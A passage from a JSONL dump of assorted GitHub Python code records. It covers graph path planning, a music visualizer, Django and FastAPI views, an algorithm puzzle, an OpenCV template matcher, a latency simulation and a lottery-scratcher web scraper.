0\n\n self.time_logs[\"add_all_edges\"] = round(time.time() - tic_edges, 3)\n\n def add_start_and_dest(self, source_pos, dest_pos):\n tic = time.time()\n\n source = self.pos2node[source_pos[0], source_pos[1]]\n dest = self.pos2node[dest_pos[0], dest_pos[1]]\n source_line = self.graph.add_vertex()\n dest_line = self.graph.add_vertex()\n\n source_dest_edges = []\n for e_out in self.g_prev.vertex(source).out_edges():\n e_out = tuple(e_out)\n node_line = self.edge_to_node[int(e_out[0]), int(e_out[1])]\n source_dest_edges.append(\n [self.graph.vertex_index[source_line], node_line, 0]\n )\n\n for e_out in self.g_prev.vertex(dest).in_edges():\n e_out = tuple(e_out)\n node_line = self.edge_to_node[int(e_out[0]), int(e_out[1])]\n source_dest_edges.append(\n [node_line, self.graph.vertex_index[dest_line], 0]\n )\n\n self.graph.add_edge_list(source_dest_edges, eprops=[self.weight])\n\n self.time_logs[\"add_start_end\"] = round(time.time() - tic, 3)\n\n return source_line, dest_line\n\n def get_shortest_path(self, source, dest):\n vertices_path = GeneralGraph.get_shortest_path(self, source, dest)\n path_line = []\n for i, v in enumerate(vertices_path[1:-1]):\n v_ind_line = self.graph.vertex_index[v]\n edge_actual = tuple(list(self.g_prev.edges())[v_ind_line])\n if i == 0:\n path_line.append(\n self.node_pos[self.g_prev.vertex_index[edge_actual[0]]]\n )\n path_line.append(\n self.node_pos[self.g_prev.vertex_index[edge_actual[1]]]\n )\n return path_line, []\n","repo_name":"NinaWie/PowerPlanner","sub_path":"power_planner/graphs/lg_from_graph.py","file_name":"lg_from_graph.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"69863815208","text":"from multirhythm import *\nfrom tools import *\nfrom correlate import coeff_correl\n\nclass VisuMulti :\n\n def __init__ (self, monoTab):\n \"\"\"\n monoTab: a list of (MonoRhythm, MonoMelody) elements\n \"\"\"\n monoRtab = []\n self.__nb_tracks = len(monoTab)\n self.__duration = 0 #tracks max duration\n for m in monoTab :\n monoRtab.append(m)\n if m.get_duration() > self.__duration:\n self.__duration = m.get_duration()\n self.__multirhythm = MultiRhythm(monoRtab)\n self.__rect_built = False\n self.__rect_rhythm = [[[0 for y in range(self.__nb_tracks)] for x in range(self.__nb_tracks)] for t in range(int(floor(self.__duration * MATRIX_FPS)))]\n\n def is_visu_ended(self, t):\n \"\"\"\n given t the index of __rect_rhythm, \n return 1 if t >= int(floor(self.__duration * MATRIX_FPS)),\n i.e if tracks are ended;\n else return 0\n \"\"\"\n return t >= floor(self.__duration * MATRIX_FPS)\n\n def __compute_interval(self, oframe, frame, length):\n if frame - CORREL_INTERVAL < 0:\n a = 0\n else:\n a = oframe[frame - CORREL_INTERVAL]\n if frame + CORREL_INTERVAL < len(oframe):\n b = oframe[frame + CORREL_INTERVAL]\n else:\n b = length\n return (a, b)\n\n\n def __coeff_to_color(self, coeff):\n \"\"\"\n return a rgb triplet, given a coeff between 0 and 1\n \"\"\"\n if coeff < 0.5:\n r = 250\n g = int(235 * (coeff * 2)) + 20\n else:\n r = int(235 * ((1 - coeff) * 2)) + 20\n g = 250\n b = 20\n return (r, g, b)\n \n\n def get_shade_list(self):\n rect_list = []\n step = max(1, MATRIX_SIZE / NB_COLORS) #1 pixel minimum required\n size = (MATRIX_SIZE, step)\n for i in range(0, MATRIX_SIZE, step):\n pos = (SCREEN_WIDTH - MATRIX_SIZE + i, TRACK_INDENT)\n surf = pg.Surface(size) \n color = self.__coeff_to_color(1.0 * i / MATRIX_SIZE)\n surf.fill(color)\n rect_list.append((surf, pos))\n return rect_list\n \n\n def get_rect_rhythm(self):\n \"\"\"\n size: size of the surface (correlation matrix) to display\n timer: media player current time\n \"\"\"\n if self.__rect_built == False:\n self.__build_rect_rhythm(coeff_correl)\n self.__rect_built = True\n return self.__rect_rhythm\n\n\n def __build_rect_rhythm(self, correl_coeff):\n \"\"\"\n creates a table img[t][x][y] of elements (surf, pos) where\n surf is the surface to blit and pos the position of the blitting\n the matrix image list is saved on the self.__rect_rhythm surface\n for each chosen frame, we display an image composed of (i, j) rectangles\n with different colours:\n - black if the track i or j has ended\n - green if the track i is in time compared to j\n - red if the track i is out of time compared to j\n (the colour ranges from green to red depending on the tardiness between i and j)\n correl_coeff: function computing a correlation coefficient list\n given two onsets lists and a time frame\n \"\"\"\n step = MATRIX_SIZE / self.__nb_tracks\n size = (step, step)\n beat = self.__multirhythm.get_beat()\n length = floor(self.__duration * MATRIX_FPS)\n nbframes = int(time_to_frame(length))\n monolist = self.__multirhythm.get_mono_list() \n x = 0\n\n for m1 in monolist: \n oenv1 = m1.get_onset_envelope() #computed only once\n sr = m1.get_sample_rate()\n hl = m1.get_hop_length()\n y = x\n\n while y < self.__nb_tracks:\n #m2 serves as reference to m1 / m2 comparison\n t = 0 #time index of the rect matrix\n time = 0 #real time corresponding to t\n oenv2 = monolist[y].get_onset_envelope()\n frame = 0 #index of oenv2\n \n if x != y:#black squares on the diagonal\n while time < length and frame < len(beat):\n interval = self.__compute_interval(beat, frame, nbframes)\n #third argument must be in frames to compare with beat\n time = self.__rect_index_to_time(t)\n if m1.get_duration() < time:\n #if the compared track is ended, show black squares until the end\n t = self.__draw_rect_colors(t, x, y, BLACK, length)\n else:\n coeff = correl_coeff(oenv1, oenv2, interval)\n if coeff < CORREL_THRESHOLD:\n color = BLACK\n else:\n color = self.__coeff_to_color(coeff)\n t = self.__draw_rect_colors(t, x, y, color, frame_to_time(beat[frame], hl, sr))\n frame += 1\n #fill the remaining time in black\n surf = pg.Surface(size)\n surf.fill(BLACK)\n while t < floor(self.__duration * MATRIX_FPS):\n pos = ((x * step, y * step))\n self.__rect_rhythm[t][x][y] = (surf, pos)\n pos = ((y * step, x * step))\n self.__rect_rhythm[t][y][x] = (surf, pos)\n t += 1 \n y += 1\n x += 1\n\n def __rect_index_to_time(self, t):\n return (t * 1.0) / MATRIX_FPS\n\n def __draw_rect_colors(self, t, x, y, color, max_time):\n step = MATRIX_SIZE / self.__nb_tracks\n size = (step, step)\n surf = pg.Surface(size)\n surf.fill(color)\n while self.__rect_index_to_time(t) < max_time:\n #blit the color while the current time (t / MATRIX_FPS) is inferior to\n #the time of the current oenv2 frame\n pos = ((x * step, y * step))\n self.__rect_rhythm[t][x][y] = (surf, pos)\n pos = ((y * step, x * step))\n self.__rect_rhythm[t][y][x] = (surf, pos)\n t += 1\n return t \n \n","repo_name":"Jedyle/music-analysis","sub_path":"src/visumulti.py","file_name":"visumulti.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27687197498","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom bbs.models import Comments, CommentsReply, UserInfo, User, Article, FriendShip\nfrom notifications.models import Notification, NotificationQuerySet\nfrom django.contrib.auth.views import login_required\nfrom django.db import transaction\nimport json\n\n\n@login_required(login_url='/bbs/signup')\ndef get_comment_list(request):\n if request.method == 'GET':\n user_info = UserInfo.objects.get(user=request.user)\n notice_comments = Notification.objects.filter(recipient=request.user, verb__in=['评论了你', '回复了你'])\n unread_count_comment = notice_comments.filter(unread=True).count()\n notice_follows = Notification.objects.filter(recipient=request.user, verb='关注了你')\n unread_count_follow = notice_follows.filter(unread=True).count()\n context = {\"notice_comments\": notice_comments, \"user_info\": user_info,\n \"unread_count_comment\": unread_count_comment, \"unread_count_follow\": unread_count_follow}\n return render(request, 'notice/notice_comments.html', context)\n\n\ndef comment_notice_update(request):\n if request.method == 'GET':\n notice_id = request.GET.get('notice_id')\n if notice_id:\n notice = Notification.objects.get(id=notice_id)\n notice.mark_as_read()\n if notice.verb == '评论了你':\n comment = Comments.objects.get(article=notice.target, content=notice.description, author=notice.actor)\n return redirect('/bbs/article/' + str(notice.target.id) + '#comment-' + str(comment.id))\n else:\n return redirect('/bbs/article/' + str(notice.target.article.id) + '#comment-' + str(notice.target.id))\n else:\n notices = Notification.objects.filter(recipient=request.user, verb__in=['评论了你', '回复了你'], unread=True)\n for notice in notices:\n notice.mark_as_read()\n return redirect(\"notice:notice_comment_list\")\n\n\ndef get_likes_and_thumbs_up_list(request):\n return render(request, 'notice/notice_likes.html')\n\n\n@login_required(login_url='/bbs/signup')\ndef get_follow_list(request):\n if request.method == 'GET':\n user_info = UserInfo.objects.get(user=request.user)\n notice_comments = Notification.objects.filter(recipient=request.user, verb__in=['评论了你', '回复了你'])\n unread_count_comment = notice_comments.filter(unread=True).count()\n notice_follows = Notification.objects.filter(recipient=request.user, verb='关注了你')\n unread_count_follow = notice_follows.filter(unread=True).count()\n has_followed = FriendShip.objects.filter(following=request.user).values_list(\"followed_id\")\n has_followed = [x[0] for x in has_followed]\n context = {\"notice_follows\": notice_follows, \"user_info\": user_info,\n \"unread_count_follow\": unread_count_follow,\n \"unread_count_comment\": unread_count_comment, \"has_followed\": has_followed}\n return render(request, 'notice/notice_follows.html', context)\n\n\ndef follow_notice_update(request):\n notices = Notification.objects.filter(recipient=request.user, verb='关注了你', unread=True)\n for notice in notices:\n notice.mark_as_read()\n return redirect(\"notice:notice_follow_list\")\n\n\ndef set_following(request):\n following = request.user\n if following.is_anonymous:\n return redirect(\"bbs:signup\")\n else:\n followed_id = request.POST.get('followed_id')\n followed = User.objects.get(id=followed_id)\n like = UserInfo.objects.get(user=following)\n fans = UserInfo.objects.get(user=followed)\n with transaction.atomic():\n FriendShip.objects.create(following=following, followed=followed)\n if like == fans:\n like.like += 1\n like.fans += 1\n like.save()\n else:\n like.like += 1\n like.save()\n fans.fans += 1\n fans.save()\n status = 1\n content = {\n \"status\": status,\n }\n return HttpResponse(json.dumps(content))\n\n\ndef cancel_following(request):\n following = request.user\n if following.is_anonymous:\n return redirect(\"bbs:signup\")\n followed_id = request.POST.get('followed_id')\n followed = User.objects.get(id=followed_id)\n like = UserInfo.objects.get(user=following)\n fans = UserInfo.objects.get(user=followed)\n with transaction.atomic():\n FriendShip.objects.get(following=following, followed=followed).delete()\n if like == fans:\n like.like -= 1\n like.fans -= 1\n like.save()\n else:\n like.like -= 1\n like.save()\n fans.fans -= 1\n fans.save()\n status = 1\n content = {\n \"status\": status\n }\n return HttpResponse(json.dumps(content))","repo_name":"wangle6318/jianshu","sub_path":"notice/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31179635258","text":"from itertools import combinations\r\nfrom collections import deque\r\nfrom copy import deepcopy\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\narr = []\r\nvi = []\r\n\r\nfor i in range(n):\r\n l = list(map(int, input().split()))\r\n arr.append(l)\r\n for j in range(len(l)):\r\n if l[j] == 2:\r\n vi.append([i, j])\r\nresult = float('inf')\r\n\r\ndx = [0, 0, -1, 1]\r\ndy = [-1, 1, 0, 0]\r\n\r\n\r\ndef bfs(vir):\r\n q = deque()\r\n cnt = 0\r\n visit = [[-1 for _ in range(n)]for _ in range(n)]\r\n\r\n for v in vir:\r\n q.append((v[0], v[1]))\r\n visit[v[0]][v[1]] = 0\r\n\r\n while q:\r\n x, y = q.popleft()\r\n\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < n:\r\n if visit[nx][ny] == -1 and arr[nx][ny] != 1:\r\n q.append((nx, ny))\r\n visit[nx][ny] = visit[x][y] + 1\r\n cnt = max(cnt, visit[nx][ny])\r\n\r\n for i in range(len(visit)):\r\n for j in range(len(visit[0])):\r\n if visit[i][j] == -1 and arr[i][j] != 1:\r\n return 10000\r\n return cnt\r\n\r\n\r\nfor virus in combinations(vi, m):\r\n result = min(result, bfs(virus))\r\n\r\nif result > 1000:\r\n print(-1)\r\nelse:\r\n print(result)\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Gold/17141. 연구소 2/연구소 2.py","file_name":"연구소 2.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26900781425","text":"import logging\nimport struct\nfrom .constants import STRING_ENCODING\n\nlog = logging.getLogger(__name__)\n\n\nclass MainIndexEntry(object):\n '''A class to read and write main index entries.'''\n\n FORMAT = \"\n''')\n\nprint(\"Opening the file...\")\nfo = open(file_name, 'w')\n\nprint(\"Truncating the file. Goodbye!\")\nfo.truncate()\n\nprint(\"Now I'm going to ask you for three lines.\")\nline1 = input(\"line 1: \")\nline2 = input(\"line 2: \")\nline3 = input(\"line 3: \")\n\nprint(\"I'm going to write these to the file.\")\nfo.write(\nline1 + \"\\n\" + line2 + \"\\n\" + line3 + \"\\n\"\n)\n\nprint(\"And finally, we close it.\")\nfo.close()","repo_name":"MasonTwoK/Python_Hard_way_exercises","sub_path":"ex16/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24193632624","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nimport yaml\nfrom pathlib import Path\n\n\nclass Config:\n\n def __init__(self, **options):\n self.raw = options\n # basic network configuration\n self.base_url = options.get('base_url', 'http://10.0.11.20/iiif')\n\n # paths\n self.source_path = Path(options.get('source_path', '/base/data/iiif/source'))\n self.source_path.mkdir(exist_ok=True)\n self.cache_path = Path(options.get('cache_path', '/base/data/iiif/cache'))\n self.cache_path.mkdir(exist_ok=True)\n\n # info.json settings\n self.min_sizes_size = options.get('min_sizes_size', 200)\n\n # process pool settings\n self.pool_size = options.get('pool_size', os.cpu_count())\n self.pool_recycle_time = options.get('pool_recycle_time', 10)\n\n # image processing settings\n self.processed_cache_size = options.get('processed_cache_size', 1024 * 1024 * 256)\n self.processed_cache_ttl = options.get('processed_cache_ttl', 12 * 60 * 60)\n\n # size definitions for the quick access endpoints\n self.thumbnail_width = options.get('thumbnail_width', 512)\n self.preview_width = options.get('preview_width', 2048)\n\n # original and batch download options\n self.download_chunk_size = options.get('download_chunk_size', 4096)\n self.download_max_files = options.get('download_max_files', 20)\n\n self.default_profile_name = options.get('default_profile', None)\n self.profile_options = options.get('profiles', {})\n\n def has_default_profile(self) -> bool:\n return self.default_profile_name is not None\n\n\ndef load_config() -> Config:\n \"\"\"\n Load the configuration and return it. The configuration must be a yaml file and will be loaded\n from the path specified by the IIIF_CONFIG env var.\n\n :return: a new Config object\n \"\"\"\n env_path = os.environ.get('IIIF_CONFIG')\n if env_path is None:\n raise Exception('The config path was not set using env var IIIF_CONFIG')\n\n config_path = Path(env_path)\n if not config_path.exists():\n raise Exception(f'The config path \"{config_path}\" does not exist :(')\n\n with config_path.open('rb') as cf:\n return Config(**yaml.safe_load(cf))\n","repo_name":"NaturalHistoryMuseum/iiif-image-server","sub_path":"iiif/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33801712754","text":"from datetime import datetime\nfrom typing import List\nfrom ..db.models.event import Event, EventRead\nfrom .auth import require_current_user, get_current_user\nfrom ..db.models.user import User\nfrom ..db.database import get_session\nfrom fastapi import APIRouter, HTTPException, Depends\nfrom sqlmodel import select, Session\n\nrouter = APIRouter(prefix=\"/event\", tags=[\"event\"])\n\nasync def get_event(id: int, session: Session = Depends(get_session)):\n event = session.exec(select(Event).where(Event.id == id)).first()\n if event is None:\n raise HTTPException(404, \"Event not found\")\n return event\n\n@router.get(\"/\", response_model=List[EventRead])\nasync def get_events(since:datetime, until:datetime, session:Session=Depends(get_session), user: User = Depends(get_current_user)):\n events = session.exec(select(Event).where(Event.start_date < until, Event.end_date >= since).order_by(Event.start_date)).all()\n return [EventRead.from_orm(event, {'is_attended': user in event.users}) for event in events]\n\nid_router = APIRouter(prefix=\"/{id}\")\n\n@id_router.get(\"/\", response_model=EventRead, responses={404: {\"description\": \"Not found\"}})\nasync def get_event(event: Event = Depends(get_event)):\n return event\n\n@id_router.post(\"/attend\")\nasync def attend_event(event: Event = Depends(get_event), user: User = Depends(require_current_user), session: Session = Depends(get_session)):\n event.users.append(user)\n session.add(event)\n session.commit()\n return \"ok\"\n\n@id_router.post(\"/stop_attend\")\nasync def attend_event(event: Event = Depends(get_event), user: User = Depends(require_current_user), session: Session = Depends(get_session)):\n event.users.remove(user)\n session.add(event)\n session.commit()\n return \"ok\"\n\nrouter.include_router(id_router)","repo_name":"ekinohito/caseclub_back","sub_path":"caseclub_back/routes/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40962051708","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image, ImageFont, ImageDraw\nimport os, random, textwrap\n\nclass BomDiaGenerator:\n def __init__(self, path_img_gerada):\n self.path_img_gerada = path_img_gerada\n\n # Carrega o arquivo de frases\n with open('./frases.txt', encoding='utf-8') as f:\n self.frases = f.read().splitlines()\n\n # Carrega o arquivo de saudacoes\n with open('./saudacoes.txt', encoding='utf-8') as f:\n self.saudacoes = f.read().splitlines()\n \n # Carrega o arquivo de cores\n with open('./cores.txt', encoding='utf-8') as f:\n self.cores = f.read().splitlines()\n \n def get_bom_dia(self, nome_img, extensao):\n \"\"\" Retorna o endereço da imagem criada \"\"\"\n img = Image.open(self.__get_imagem_random())\n draw = ImageDraw.Draw(img)\n\n self.__escrever_texto_na_imagem(draw, self.__get_frase_random(), 30, 40, 25, False)\n \n self.__escrever_texto_na_imagem(draw, self.__get_saudacao_random(), 460, 50, 20, True)\n\n img.save('{}/{}.{}'.format(self.path_img_gerada, nome_img, extensao))\n \n def __escrever_texto_na_imagem(self, draw, frase, pos_y, tam_fonte=40, tam_linha=25, texto_colorido=False):\n fnt = ImageFont.truetype(self.__get_font_random(), tam_fonte)\n borda = 2\n \n cor_texto = (255, 255, 255)\n if texto_colorido:\n cor_texto = self.__get_cor_random()\n\n lines = textwrap.wrap(frase, width=tam_linha)\n y_text = pos_y\n for line in lines:\n width, height = fnt.getsize(line)\n draw.text((((600 - width) / 2) - borda, y_text - borda), line,(0,0,0),font=fnt)\n draw.text((((600 - width) / 2) + borda, y_text - borda), line,(0,0,0),font=fnt)\n draw.text((((600 - width) / 2) + borda, y_text + borda), line,(0,0,0),font=fnt)\n draw.text((((600 - width) / 2) - borda, y_text + borda), line,(0,0,0),font=fnt)\n\n \n \n draw.text(((600 - width) / 2, y_text), line, font=fnt, fill=cor_texto)\n y_text += height\n\n def __get_cor_random(self):\n rand = self.cores[random.randint(0, len(self.cores) - 1)]\n return tuple(map(int, rand.split(\",\")))\n\n def __get_imagem_random(self):\n return 'imgs/' + random.choice(os.listdir('imgs/')) \n\n def __get_font_random(self):\n return 'fonts/' + random.choice(os.listdir('fonts/')) \n\n def __get_frase_random(self):\n return self.frases[random.randint(0, len(self.frases) - 1)]\n \n def __get_saudacao_random(self):\n return self.saudacoes[random.randint(0, len(self.saudacoes) - 1)]","repo_name":"Kushima/bomdia-tia","sub_path":"bomdia_tia.py","file_name":"bomdia_tia.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2057039006","text":"# MultiTemplateSearch 11/12/17\n\n# Will return the locations of multiple template matches in an image\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pyautogui\nimport time\n\nimg_rgb = cv2.imread('Cakes.png')# The path for the image you are searching goes here.\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)# Convert the color of the image\ntemplate = cv2.imread('cake2.png',0)# The path for your template (The image you are searching for) goes here\nw, h = template.shape[::-1]\n\nres = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)# Run the matchTemplate cv2 function\nthreshold = .95 # Higher is more accurate, and will yeild less possitives\nloc = np.where( res >= threshold)\n\ncount = 0\nx = []\ny = []\n\nfor pt in zip(*loc[::-1]): # Find all the matches and organize them into two lists with coordinates\n cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2) # Draw rectangles on matches\n\n count = count + 1\n x.append(pt[0] + w/2)\n y.append(pt[1] + h/2)\n\n\n# Resize the image\nscale = 2\n(newx, newy) = img_rgb.shape[1] / scale, img_rgb.shape[0] / scale # new size (w,h)\nscaled = cv2.resize(img_rgb, (int(newx), int(newy)))\n\n# Display results\ncv2.imshow(\"Scaled\", scaled)#scaled image\ncv2.imshow(\"Image Matches\", scaled)#original image\n\nprint(\"Count = {}\".format(count))#How many matches found\n\n#Print out locations\ncounts = 0\nwhile counts <= count-1:\n print(\"X = \" + str(x[counts]) + \" Y = \" + str(y[counts]))\n pyautogui.moveTo(int(x[counts] / 2), int(y[counts] / 2))\n counts += 1\n\nprint(\"{} cakes found.\".format(count))\n\n\ncv2.waitKey(0) # wait for an esc keypress\ncv2.destroyAllWindows()\n","repo_name":"pizzafoot/TemplateMatching","sub_path":"MultiTemplateSearch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728476820","text":"#!/usr/bin/env python3\n#\n#euler323 / Bitwise-OR operations on random integers\nimport time\n\n# Debut du decompte du temps\nstart_time = time.time()\n\n# main\nE = 0 #expectation\nprevious_prob = 0 #probability of previous N\nfor i in range(1, 100):\n E+=i*(((2**i-1)/(2**i))**32-previous_prob)\n previous_prob = ((2**i-1)/(2**i))**32\n if i%10==0:\n print(E) #converges to the answer\n\n# Affichage du temps d execution\nprint(\"Temps d execution : %s secondes ---\" % (time.time() - start_time))","repo_name":"allagonne/Euler_project","sub_path":"euler323.py","file_name":"euler323.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172608809","text":"import multiprocessing\nimport random\nfrom typing import Dict\n\nimport simpy\nfrom matplotlib import pyplot as plt\n\nfrom result_container import ResultContainer\nfrom src import default_architecture_parameters\nfrom src.clients.data_reader_client import DataReaderClient\nfrom src.processing_units.processing_location_central import ProcessingLocationCentral\nfrom src.processing_units.processing_location_district import ProcessingLocationDistrict\nfrom src.processing_units.on_processing_ended_enum import OnProcessingEndedEnum\n\nTOTAL_PACKAGES_READ_BY_EACH_CLIENT = 2 # Note: each client has a waiting time before reading a new data.\nCLIENTS_DISTRICTS_RATIO_RANGE = [2, 125, 250, 375, 500, 625, 750, 875, 1000, 1125, 1250, 1375, 1500, 1625]\nprint(list(CLIENTS_DISTRICTS_RATIO_RANGE))\n\nCONFIGURATIONS_EDGE = [{\"ratio\": i, \"type\": \"edge\"} for i in CLIENTS_DISTRICTS_RATIO_RANGE]\nCONFIGURATIONS_CLOUD = [{\"ratio\": i, \"type\": \"cloud\"} for i in CLIENTS_DISTRICTS_RATIO_RANGE]\n\n\ndef run_configuration(config: Dict) -> ResultContainer:\n ratio = config['ratio']\n number_of_clients = default_architecture_parameters.NUMBER_OF_DISTRICTS * ratio\n print(f\"################## Running configuration: {ratio}\")\n\n # Setup the simulation.\n result_container = ResultContainer(simulation_name=str(ratio), simulation_type=config['type'])\n env = simpy.Environment()\n\n edge_locations = []\n if config[\"type\"] == \"edge\":\n for i in range(default_architecture_parameters.NUMBER_OF_DISTRICTS):\n edge_district = ProcessingLocationDistrict(\n simpy_env=env,\n result_container=result_container,\n name=f'Location{i}',\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_DISTRICT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_DISTRICT,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n edge_district.start_listening_for_incoming_data()\n edge_locations.append(edge_district)\n elif config[\"type\"] == \"cloud\": # If cloud, setup the cloud and data_producers\n cloud = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=\"Cloud\",\n is_data_coming_from_first_link=True,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_CENTRAL,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n cloud.start_listening_for_incoming_data()\n edge_locations.append(cloud)\n else:\n raise Exception('Type not recognized')\n\n for i in range(number_of_clients):\n data_reader = DataReaderClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n use_single_transmission=True,\n transmission=random.choice(edge_locations).get_incoming_transmission(),\n number_of_packages_to_read=TOTAL_PACKAGES_READ_BY_EACH_CLIENT,\n )\n data_reader.start_reading_data()\n\n # Run simulation.\n env.run()\n\n result_container.print_result()\n return result_container\n\n\npool = multiprocessing.Pool(processes=4) # Less processes to avoid to use too much RAM.\nresults_edge = pool.map(run_configuration, CONFIGURATIONS_EDGE)\n\npool = multiprocessing.Pool(processes=4) # Less processes to avoid to use too much RAM.\nresults_cloud = pool.map(run_configuration, CONFIGURATIONS_CLOUD)\n\n# Prepare plot variables\ntotal_latencies_edge = [result.get_average_total_latency() for result in results_edge]\ntotal_latencies_cloud = [result.get_average_total_latency() for result in results_cloud]\ntotal_distance_edge = [result.get_average_first_link_distance() + result.get_average_second_link_distance() for result in results_edge]\ntotal_distance_cloud = [result.get_average_first_link_distance() + result.get_average_second_link_distance() for result in results_cloud]\nx_positions = [default_architecture_parameters.NUMBER_OF_DISTRICTS * i for i in CLIENTS_DISTRICTS_RATIO_RANGE]\n\n# Plot total latency.\nplt.figure(figsize=(8, 6))\nplt.title('Read Latencies')\nplt.plot(x_positions, total_latencies_edge, color=\"green\")\nplt.plot(x_positions, total_latencies_cloud, color=\"red\")\nplt.axes().yaxis.grid() # horizontal lines\nplt.axes().set_xlim([0, None])\nplt.axes().set_ylim([0, None])\nplt.xlabel(\"Number of clients\")\nplt.ylabel(\"Average Read Latency\")\nplt.legend([\"Edge solution\", \"Cloud solution\"])\nplt.tight_layout()\nplt.show()\n\n# Plot sum of traffic uncut.\nplt.figure(figsize=(8, 6))\nplt.title('Read Distances')\nplt.plot(x_positions, total_distance_edge, color=\"green\")\nplt.plot(x_positions, total_distance_cloud, color=\"red\")\nplt.axes().yaxis.grid() # horizontal lines\nplt.axes().set_xlim([0, None])\nplt.axes().set_ylim([0, None])\nplt.xlabel(\"Number of clients\")\nplt.ylabel(\"Average Read Distance\")\nplt.legend([\"Edge solution\", \"Cloud solution\"])\nplt.tight_layout()\nplt.show()\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/simulation_read_district_level_clients_ratio.py","file_name":"simulation_read_district_level_clients_ratio.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73091317288","text":"import requests\nfrom flask import Flask, jsonify, request\nimport re\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom mysql.connector import MySQLConnection, Error\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom flask_cors import CORS\n\nimport mysql.connector\n\napp = Flask(__name__)\nCORS(app) \n\n\n\n# Establishes a connection with CA Lottery website, uses Solenium to cycle pages and scratchers, \n# and Beautiful Soup to parse for info\ndef retrieve_scratcher():\n\n #initalize webdriver\n options = webdriver.ChromeOptions()\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--incognito')\n options.page_load_strategy = 'eager'\n options.add_argument('--headless=new')\n driver = webdriver.Chrome(options=options)\n\n \n driver.get(\"https://www.calottery.com/scratchers\")\n\n scratcher_info = []\n\n for i in range(2, 7):\n \n \n #Find page buttons\n pages = driver.find_elements(By.CLASS_NAME, \"page-link\")\n\n #initialize BeautifulSoup, find links to all scratcher pages\n main_page = driver.page_source\n soup = BeautifulSoup(main_page, 'html.parser')\n results = soup.find(id=\"scratchers-results\")\n cards = results.find_all(\"a\", href=True)\n\n\n #Scrape the URL for each scratcher\n for card in cards:\n href = card.get(\"href\")\n try:\n #find scratcher info and add it to list\n scratcher_info.append(get_info(\"https://www.calottery.com\" + href))\n except Exception as e:\n print(e)\n continue\n\n \n \n\n \n driver.execute_script(\"arguments[0].click();\", pages[i])\n\n #wait for page to load\n time.sleep(1)\n\n driver.close()\n\n #insert scratcher info into MySQL table\n\n sql = \"INSERT INTO scratchers (scratcher_name, price, odds, Top_Prize, Top_Prizes_left, Top_Prize_Odds, img_source) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s) \" \\\n \"ON DUPLICATE KEY UPDATE odds = VALUES(odds), \" \\\n \"Top_Prizes_left = VALUES(Top_Prizes_left), \" \\\n \"Top_Prize_Odds = VALUES(Top_Prize_Odds)\"\n \n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n\n #connect to server\n if cnx.is_connected():\n print('Connected to MySQL server')\n\n cursor = cnx.cursor()\n\n #Execute query\n cursor.executemany(sql, scratcher_info)\n\n cnx.commit()\n\n cursor.close()\n cnx.close() \n\n #print(scratcher_info)\n\n\n#Scrapes scratcher page for info, such as odds, name, price, prizes, and img source\ndef get_info(URL):\n \n page = requests.get(URL)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n\n results = soup.find(id=\"content\")\n\n #Retrieve name\n scratcher_name = results.find(\"h1\", class_=\"page-title--text field-title\")\n print(scratcher_name.text)\n \n\n #Retrieve odds\n odds = 